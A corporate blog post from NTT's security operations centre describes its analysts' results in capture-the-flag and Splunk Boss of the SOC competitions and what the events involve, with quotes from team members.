Competing in Cyber Security
Published:

One of the great challenges of cyber security is the need to learn continuously. Just as our adversaries adapt and change all the time, we need to remain one step ahead of them. This is especially true of the analysts in our SOC, who never stop learning. The SOC is the front-line where analysts are exposed to all the latest exploits developed by threat actors. That exposure, on its own, isn’t enough, however. That is why our analysts are on a continuous quest to learn from their peers and from the industry.
One exciting and rewarding way for our analysts to test themselves and learn from their peers is by participating in cyber security competitions. These are highly competitive events where analysts get to pit themselves against peers from other organizations in events which test both their skill and their resolve to overcome adversaries in high-pressure situations. In some cases, analysts even get the chance to take on the role of the attacker, which helps them to better understand the tactics and strategies used by their adversaries.
Our SOC teams have participated in a number of cyber security competitions and have achieved top results in competition against other highly skilled teams, consistently placed in the top 1%. The list below lists some of our achievements in recent years.
- 65th Cyber Apocalypse CTF 2024 among 5694 teams
- 5th Splunk Boss of the SOC EMEA 2023 among 1100 teams
- 17th Cyber Apocalypse CTF 2022 among 7024 teams
- 17th Hack the Box Business CTF Dirty Money 2022 among 657 teams
- 6th Splunk Boss of the SOC v6.conf21 2021 among 425 teams
- 2nd Splunk Boss of the SOC Nordic 2020 among 43 teams
- 1st and 2nd Splunk Boss of the SOC Helsinki 2019 among 14 teams
Capture the flag (CTF) competition has become increasingly popular among cyber security professionals, providing a fun and engaging way to test and improve skills. To succeed in a CTF competition, participants must have a strong understanding of a wide range of security concepts and techniques. These may include cryptography, web security, reverse engineering, forensics, exploit development, and programming. Participants must use their expertise and problem-solving abilities to complete these challenges and earn points or capture the flag.
The joint NTT team EntitySec which include members from Japan SOC ,Sweden SOC, and Offensive Security Teams has had the opportunity to compete against several of the most respected security firms in the industry at at the Cyber Apocalypse CTF hosted by Hack The Box in Marsh 2024. Among 5694 competing teams, they proudly secured the 65th spot, with an impressive tally of 52 out of 64 flags captured (81% completion). Notably, they achieved a flawless performance in the Forensics category, seizing all 10 flags available. Challenges encompassed intricate tasks like Network Analysis, Malware Analysis, and Memory Forensics.
At one other CTF even, our analyst successfully solved a malware analysis related challenge offered some great feedback on the real world value of a challenge they encountered in the same competition: “We received an email with a suspicious document attached. The document contained a malicious VBA script that attempted to download malware when the user opened it. We were able to obtain the malware and reverse engineer it to find the flag that was hidden within it.” This technique has been observed in multiple malware families, including Emotet, IceID, and Dridex.
Another popular cyber security competition is Boss of the SOC (BOTS) arranged by Splunk. BOTS is a cyber security competition that involves participants attempting to detect and respond to simulated security threats in a SOC environment. The participants are typically presented with a set of simulated network environments and are asked to detect and respond to security threats in real-time. These threats may include malware, network intrusions, and other types of cyber-attacks.
One of our team members who participated in BOTS describes “BOTS puts our threat hunting skills to the test. We got to make use of different logs, statistics, geolocation, and more to hunt for everything from APT groups to kidnapped toads.” Another member added “BOTS pushed my problem-solving skills to the limit and taught me new strategies that have been useful in my role as an analyst.”
Overall, CTF and BOTS competitions provide a unique and exciting opportunity for security professionals to test and improve their skills. These competitions are challenging and engaging and can help participants to stay sharp and up-to-date on the latest security technologies and techniques. Whether you are a seasoned veteran or a newcomer to the field of security, participating in a CTF or BOTS competition can be a rewarding and valuable experience.
Cyber security competitions provide a competitive proving ground where our analysts can hone their skills. The experience they build from the perspective of both the defender and the attacker provides them with an invaluable edge. NTT’s Samurai Managed Detection and Response service relies on the continuous learning that our analysts undertake so that we can keep ahead of threat actors as we defend our clients.